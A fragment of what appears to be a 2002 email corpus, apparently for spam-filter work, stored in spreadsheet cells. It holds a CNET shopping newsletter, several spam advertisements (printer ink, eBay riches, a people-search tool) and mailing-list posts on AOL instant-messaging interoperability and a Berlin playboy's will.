 											&lt;td align=right width=400&gt;&lt;img src="http://www.cnet.com/b.gif"&gt;&lt;br&gt;
 											&lt;font face="arial, helvetica" size="-2"&gt;July 9, 2002&lt;/font&gt;&lt;/td&gt;
 										&lt;tr valign=top&gt;
 &lt;!--c4s--&gt;									&lt;td&gt;&lt;A href="#c4s"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12														border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#c4s"&gt;&lt;b&gt;From Computers4Sure&lt;/b&gt;&lt;/A&gt;&lt;BR&gt;Save an extra $50 on the iPaq 3835 PDA.&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 &lt;!--dell--&gt;							&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td&gt;&lt;A href="#dell"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12 border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#dell"&gt;&lt;b&gt;From Dell&lt;/b&gt;&lt;/A&gt; &lt;BR&gt;Enter to win your chance to win $50,000 from Dell!&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 								&lt;/table&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 						&lt;tr&gt;
 							&lt;td bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 &lt;br&gt;
 &lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- C4S TEMPLATE --&gt;
 &lt;a name="c4s"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Computers4Sure&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235579.gif""&gt;&lt;/P&gt;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 Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDxAS0WI95vnMUN5xspo4R" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/7934746_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7no5iCfsTxIiSupcptbPMuR" &gt;&lt;B&gt;iPaq 3835 Pocket PC &lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; $50 rebate &lt;BR&gt; 
 &amp;#149; 64 MB, brilliant TFT screen&lt;BR&gt;
 &amp;#149; 206 MHz Intel processor&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$549&lt;/font&gt; after rebate&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZxT7j3ipb9R0CGk_HtsosR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/8866992_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JxgI4elI70NpbnpTbdL3ZR" &gt;&lt;B&gt;Cyber-shot Digital Camera DSC-P51&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;
 								&amp;#149; 2-megapixels, 1280x960 res.&lt;BR&gt;
 								&amp;#149; 2x optical zoom/3x digital zoom&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$300&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 							&lt;tr valign=top&gt;
 									&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oqt0jNqO_7qeZDozn6f5dR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/7767019_120_1.gif" width=120 height=90&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2W7kyO-ZPhsYK3Awi9qcR" &gt;&lt;B&gt;Maxtor DiamondMax D540X 160GB&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Outstanding capacity &amp; value&lt;BR&gt;
 								&amp;#149; 2MB buffer, Avg. Seek 12ms &lt;BR&gt;
 								&amp;#149; 5400 RPM, Ultra ATA/133 &lt;BR&gt;
 							    &amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$260&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;	
 &lt;!-- center ad --&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- /center ad --&gt;
 &lt;!-- buy.com TEMPLATE --&gt;
 &lt;a name="dell"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Dell&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235085.gif""&gt;&lt;/P&gt;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&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;font face="arial, helvetica" size="-1" &gt;$50K-a-day Giveaway from Dell Home Systems. . .
 Buy any new Dell Home System on or before July 31, 2002 and you'll
 be automatically entered to win $50,000. The next lucky winner
 could be you!
 &lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzok01r_OlrZIGiR6ImOZR" &gt;&lt;B&gt;More rules and info&lt;/b&gt;&lt;/a&gt;
 &lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8HTgm-00VWDjP2qJ13b4dR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/8582529_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDVciVaQ1oQqYoj1cTQ4cR" &gt;&lt;B&gt;Dell Dimension 4000 series&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; 1.7 GHz to 2.53 GHz P4&lt;BR&gt;
 								&amp;#149; 128 MB to 1 GB RAM&lt;BR&gt;
 								&amp;#149; Up to 120 GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$689&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4ohONo2QMxvH3QainXQRR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/co/ps/120/8582671_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPP_hrTR6P9VA35c54JMlR" &gt;&lt;B&gt;Dell Dimension 8000 series&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 1.8 GHz to 2.53 GHz P4&lt;BR&gt;
 								&amp;#149; 128 MB to 2 GB RAM&lt;BR&gt;
 								&amp;#149; Up to 120 GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Starting at &lt;font color="#CC0000"&gt;$919&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;		 
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;p&gt;
 &lt;/p&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#CCCCCC"&gt;&lt;img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bgcolor="#666666"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width="599" bgcolor="#EEEEEE"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#EEEEEE"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width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="575"&gt;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;&lt;img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HREF='http://clickthru.online.com/Click?q=61-x9GAz2Lat_TSiZbSKkrzTGSlEPChIsRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3_R0CUR1okYP2r70U6iR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y_jjfYkxEYIEElDh4B1FR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="8"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="601"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#CCCCCC" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr height="18"&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#666666"&gt;&lt;img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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-09" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=a0-11f8-fB6N35HwGddp42g1eIvgdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: zzzz,Hello
</t>
  </si>
  <si>
    <t xml:space="preserve">Are you tired of spending a fortune on printer cartridges?  
 Are you tired of making a mess trying to refill your old cartridges?
 Then here's your answer......
 PRINTER CARTRIDGES FOR UP TO 50% OFF STORE PRICES
 The average person spends over $150 on new cartridges per year.....
 DON'T BE ONE OF THEM...EMAIL TODAY!
 PLEASE DO NOT USE THE REPLY BUTTON
 CLICK HERE:    printerink1@cbphost.net
 Just include your printer or cartridge type, and we will email you back 
 the price, its that simple.  THIS WILL SAVE YOU LOTS OF MONEY!!  Be 
 sure to ask about our referral discount for passing the savings on to a 
 friend.  
 If we don't save you $$, you have lost nothing!    In addition, just 
 reply with your printer type, and be automatically entered in our 
 monthly $50 gift certificate drawing.
 We just wanted to save you some money, but to unsubscribe to this 
 mailing email here:  printerink2@cbphost.net   and just type 'REMOVE' in 
 the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: AOL scaling back IM interoperability
</t>
  </si>
  <si>
    <t xml:space="preserve">I suppose the main surprise here is that AOL is coming clean at all. After
 all, its long-running game of talking interop, and doing everything possible
 to prevent open standards in this arena, seemed to have been working fine,
 with most end users completely oblivious to AOL's actions.
 http://www.quicken.com/investments/news/story/djbn/?story=/news/stories/dj/2
 0020723/ON20020723000833.htm
 America Online Scales Back Instant-Messaging Compatibility Efforts
 Updated: Tuesday, July 23, 2002 01:23 PM ET
 Dow Jones Newswires
 NEW YORK -- America Online appears to be scaling back efforts to make its
 instant-messaging service compatible with rival services.
 The unit of AOL Time Warner Inc. (AOL, news, msgs) said in a regulatory
 filing it is now focusing on messaging interoperability methods that are
 more limited in scope than the kind envisioned by the Federal Communications
 Commission when it approved the AOL-Time Warner merger in January 2001.
 America Online isn't required to make its messaging system interoperable
 with others, but the FCC's merger approval included what it considered to be
 incentives for the company to do so. It also required AOL to file progress
 reports on its interoperability efforts every six months. The most recent
 report, filed last week, disclosed the company's new direction.
 The upshot of the strategy shift is that the instant-messaging market isn't
 much closer to broad-based interoperability than it was 18 months ago,
 according to industry analysts. Unlike e-mail, users of most competing
 instant-messaging services still can't directly trade messages. So an
 America Online instant- messaging user can't communicate with a user of
 Microsoft Corp.'s (MSFT, news, msgs) MSN Messenger, except by using
 third-party software such as Trillian.
 America Online, the biggest instant-messaging provider, has been criticized
 for blocking users of rival services from gaining access to its users. The
 company also has been accused of dragging its feet amid industry attempts at
 interoperability.
 For its part, America Online has said it wants to protect the security of
 its users and the reliability of its system. And it points out that other
 companies have so far failed to agree on interoperability standards.
 When the FCC approved the AOL-Time Warner merger, it said that if America
 Online wanted to offer video-conferencing and other advanced
 instant-messaging features over Time Warner's cable lines, it first had to
 enable its instant- messaging users to communicate with users of rival
 services. The intent of the condition was to prevent America Online from
 widening its dominance of the instant-messaging market by exploiting its
 access to Time Warner cable systems.
 AOL hasn't yet introduced video features, even though rivals Microsoft and
 Yahoo Inc. (YHOO, news, msgs) did so last year.
 Specifically, the FCC said America Online would have to implement a
 technology known as "server-to-server interoperability" before it could
 offer video. The technology would allow users of non-America Online services
 to detect when AOL users are online, and to trade messages. It would do so
 via communications between the computer servers operated by each messaging
 provider, using a common language.
 But in the progress report filed with the FCC last week, America Online said
 it will "focus its efforts" on alternatives to server-to-server
 interoperability. They are more limited in scope than server-to-sever.
 As an example of an alternative, America Online cited a recent agreement to
 make its instant-messaging service compatible with a new messaging service
 from Apple Computer Corp. (AAPL, news, msgs). The Apple service, IChat, will
 be included in Mac OS X 10.2, the new Apple operating system set for release
 in August.
 IChat users will be able to talk to America Online users, but it won't
 involve server-to-server interoperability. Instead, the actual exchange of
 messages will occur only on America Online's servers, even as IChat
 customers use Apple software.
 "We believe this kind of hosted IM solution provides, at least in the short
 term, a secure, reliable and cost-effective means to provide
 interoperability between AOL, IM and unaffiliated IM communities," Steven
 Teplitz, AOL's associate general counsel, wrote in the progress report to
 the FCC.
 As to the apparent change in strategy, company spokeswoman Kathy McKiernan
 said Tuesday: "It's a recognition that server-to-server has proven a hard
 nut to crack for the entire industry." Indeed, users of America Online's
 rival services can't directly communicate with each other, either.
 The alternative solution "was something that we could implement now to
 provide for IM communities to communicate," said Ms. McKiernan, adding
 America Online would explore partnerships with other messaging providers,
 similar to the Apple deal. None has been announced so far.
 FCC officials couldn't be reached Tuesday.
 America Online hasn't ruled out the possibility that it would someday
 implement server-to-server interoperability. The company has explored the
 technology in the past, including a server-to-server last year with Lotus
 Development, a unit of International Business Machines Corp. (IBM, news,
 msgs).
 But America Online's interoperability test with Lotus was "limited in scope
 and functionality." True server-to-server technology "would require further
 significant expenditures of time and resources to develop," wrote Mr.
 Teplitz.
 The Internet Engineering Task Force, a group devoted to developing Internet
 standards, has been working on a server-to-server messaging technology but
 hasn't yet developed a final version, according to America Online. Task
 force representatives couldn't be reached.
 The company's strategy shift means that true interoperability in instant
 messaging is still a couple of years away, according to Michael Gartenberg,
 analyst with Jupiter Research.
 "It's still something the market wants," he said. "At some point, it'll
 happen, but maybe a couple of years down the road."
 Mr. Gartenberg and other analysts believe America Online hasn't actively
 pursued true interoperability because it wants to protect its large user
 base. If messaging systems were compatible, the company could lose ground
 because prospective customers might see no difference in choosing another
 provider, as long as they can reach America Online users.
 But partly because of its lack of compatibility and the FCC conditions,
 America Online hasn't kept up with rivals in offering new services. MSN and
 Yahoo have had video-conferencing via instant-messaging since last year. AOL
 has denied that it has held back on video messaging to avoid making its
 system interoperable, arguing there is little consumer demand for it.
 But the new features have paid off for the company's rivals, and they are
 catching up. Between last October and April, Microsoft's Messenger user base
 rose 32% to 29.1 million, according to ComScore Media Metrix, while Yahoo's
 base jumped 19% to 19.2 million users. In the same period, the number of
 users of AOL-branded messaging services increased 7% to 54.9 million.
 -Peter Loftus; Dow Jones Newswires; 201-938-5267; peter.loftus@dowjones.com
 Copyright 2002 Dow Jones &amp; Company, Inc.
 All Rights Reserved
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Playboy wants to go out with a bang
</t>
  </si>
  <si>
    <t xml:space="preserve">The Scotsman - 22 August 2002
  Playboy wants to go out with a bang 
  AN AGEING Berlin playboy has come up with an unusual offer to lure women into
  his bed - by promising the last woman he sleeps with an inheritance of 250,000
  (160,000). 
  Rolf Eden, 72, a Berlin disco owner famous for his countless sex partners,
  said he could imagine no better way to die than in the arms of an attractive
  young woman - preferably under 30. 
  "I put it all in my last will and testament - the last woman who sleeps with
  me gets all the money," Mr Eden told Bild newspaper. 
  "I want to pass away in the most beautiful moment of my life. First a lot of
  fun with a beautiful woman, then wild sex, a final orgasm - and it will all
  end with a heart attack and then Im gone." 
  Mr Eden, who is selling his nightclub this year, said applications should be
  sent in quickly because of his age. "It could end very soon," he said.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make a Fortune On eBay                         24772
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
   &lt;tr valign=3D"top"&gt; 
     &lt;td height=3D"295" bgcolor=3D"#FFFFFF"&gt; 
       &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;b&gt;&amp;quot;eBay - #1 Rated Work A=
 t Home Business 
         Opportunity&amp;quot;&lt;br&gt;
         - &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font size=3D"4"&gt;PC Magazine&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"3"&gt;&lt;b&gt;Fortunes are literally being=
  made in 
         this great new marketplace!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"left"&gt;O&lt;font size=3D"3"&gt;&lt;/font&gt;&lt;font size=3D"3"&gt;ver &lt;b&gt;$=
 9 Billion&lt;/b&gt; 
         in merchandise was sold on &lt;b&gt;eBay&lt;/b&gt; in 2001 by people just like=
  you 
         - &lt;u&gt;right from their homes.&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"left"&gt;&lt;font size=3D"3"&gt;Now you too can learn the secrets=
  of &lt;b&gt;successful 
         selling &lt;/b&gt;on&lt;b&gt; eBay&lt;/b&gt; and &lt;b&gt;make a staggering income&lt;/b&gt; fro=
 m the 
         comfort of &lt;b&gt;your own home&lt;/b&gt;. If you are &lt;b&gt;motivated&lt;/b&gt;, capa=
 ble 
         of having an&lt;b&gt; open mind&lt;/b&gt;, and can follow simple directions, t=
 hen 
         &lt;a href=3D"http://www.generaledu.com/ebaymktg"&gt;visit us here.&lt;/a&gt;&lt;=
 /font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size=3D"2"&gt; &lt;font size=3D"1"&gt;We are strongly against sendin=
 g unsolicited 
         emails to those who do not wish to receive our special mailings. Y=
 ou have 
         opted in to one or more of our affiliate sites requesting to be no=
 tified 
         of any special offers we may run from time to time. We also have a=
 ttained 
         the services of an independent 3rd party to overlook list manageme=
 nt and 
         removal services. This is NOT unsolicited email. If you do not wis=
 h to 
         receive further mailings, please &lt;a href=3D"http://www.generaledu.=
 com/remove.html"&gt;GO 
         HERE&lt;/a&gt; to be removed from the list. Please accept our apologies =
 if you 
         have been sent this email in error. &lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;head&gt;&lt;p&gt;&lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 &lt;p&gt;charset=3Diso-8859-1"&gt;&lt;p&gt;&lt;/head&gt;&lt;p&gt;&lt;p&gt;&lt;body bgcolor=3D"#FFFFFF"&gt;&lt;p&gt;&lt;tab=
 le width=3D"78%" height=3D"218" bgcolor=3D"#CCCCCC"&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: , Find Out the Truth About Anyone!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --__________MIMEboundary__________
 Content-Type: text/plain
 Content-Transfer-Encoding: quoted-printable
 X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6Q1hFi4026730
  THE EASIEST WAY TO FIND OUT THE TRUTH ABOUT ANYONE
 People Searches, Background Checks, Criminal Records, Court
 Records and more.
 Learn More: http://r.vresp.com/?A/2f1cbd6989/37447/aa3b97bcc2
 Net Detective 7.0 is an amazing new tool that allows you to
 dig up facts about anyone. It is all completely legal, and
 you can use it in the privacy of your own home without
 anyone ever knowing. It's cheaper and faster than hiring a
 private investigator.
 Find the scoop on anyone- within minutes.
  Family members
  Estranged Lovers
  Girlfriends/Boyfriends
  Neighbors
  Enemies
  Old Friends
  Your Boss
  Even yourself!!
 -------------------------------------------------------------------------=
 -
 *LOCATE anyone=92s email address, phone number or address
 *VERIFY your own credit reports so you can correct wrong information
 *FIND debtors and locate hidden assets
 *CHECK driving and criminal records
 *REUNITE with old classmates, a missing family member, a long lost love
 *PREVENT identity theft
 For More Info: http://r.vresp.com/?A/2acdad1268/37447/aa3b97bcc2
 Endorsed by the National Association of Independent Private
 Investigators (NAIPI)
 ______________________________________________________________________
 You have signed up with one of our network partners to receive email
 providing you with special offers that may appeal to you. If you do not
 wish to receive these offers in the future, reply to this email with
 "unsubscribe" in the subject or simply click on the following link:=20
 http://unsubscribe.verticalresponse.com/u.html?968af93806/aa3b97bcc2
 --__________MIMEboundary__________
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;   &lt;head&gt;   &lt;meta http-equiv="content-type"
 content="text/html;charset=ISO-8859-1"&gt;   &lt;meta name="generator"
 content="Microsoft FrontPage 5.0"&gt;   &lt;title&gt;NetDetective--Find Out The
 Truth About Anyone!&lt;/title&gt;  &lt;/head&gt;   &lt;body bgcolor="#ffffff"
 link="#aa0000" vlink="#aa0000"&gt;   &lt;div align="center"&gt;    &lt;table
